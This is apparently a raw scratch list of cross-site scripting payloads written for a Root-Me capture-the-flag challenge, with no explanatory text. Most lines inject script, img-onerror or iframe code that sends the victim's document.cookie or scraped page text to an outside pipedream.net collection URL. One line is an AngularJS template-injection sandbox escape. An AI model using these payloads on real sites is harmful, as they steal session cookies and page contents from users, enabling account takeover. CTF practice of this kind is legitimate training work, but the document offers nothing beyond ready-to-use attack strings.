<script>document.location=("https://eo4adedl4xfs7hf.m.pipedream.net/"+document.cookie);</script>
http://challenge01.root-me.org:58008/page?user="><script><img src="https://eo4adedl4xfs7hf.m.pipedream.net/test"/></script>
http://challenge01.root-me.org:58008/page?user=<script>document.location=("https://eo4adedl4xfs7hf.m.pipedream.net/cookie"+document.cookie);</script>
http://challenge01.root-me.org:58008/<script>document.location=("https://eo4adedl4xfs7hf.m.pipedream.net/cookie"+document.cookie);</script>

<script>document.location=("https://eo4adedl4xfs7hf.m.pipedream.net/"+document.querySelector("body > div.wrapper > div:nth-child(2) > p").textContent.slice(200).replace(/\s/g, ''));</script>

http://challenge01.root-me.org:58008/page?user=Monu<script>document.location=("https://eo4adedl4xfs7hf.m.pipedream.net/"+document.querySelector("body").textContent.trim().replace(/\s/g, ''));</script>

<iframe src="https://eo4adedl4xfs7hf.m.pipedream.net/test"></iframe>

<Script Src=/libs/angular-1.6.0.js></Script><K Ng-App>{{$new.constructor('alert(1)')()}}

<iframe src="fa" onerror="document.location=('https://eo4adedl4xfs7hf.m.pipedream.net/test')"></iframe>
http://challenge01.root-me.org:58008/page?user=<img src=x onerror="window.top.location=(`//eo4adedl4xfs7hf.m.pipedream.net/${document.querySelector('body').textContent.slice(200).trim().replace(/\s/g, '')}`)"/>

<img/src="fa" onerror="fetch('https://google.fr')"/>

<iframe src='data:text/html,<script defer="true" src="data:text/javascript,document.body.innerText=/hello/"></script>'></iframe>
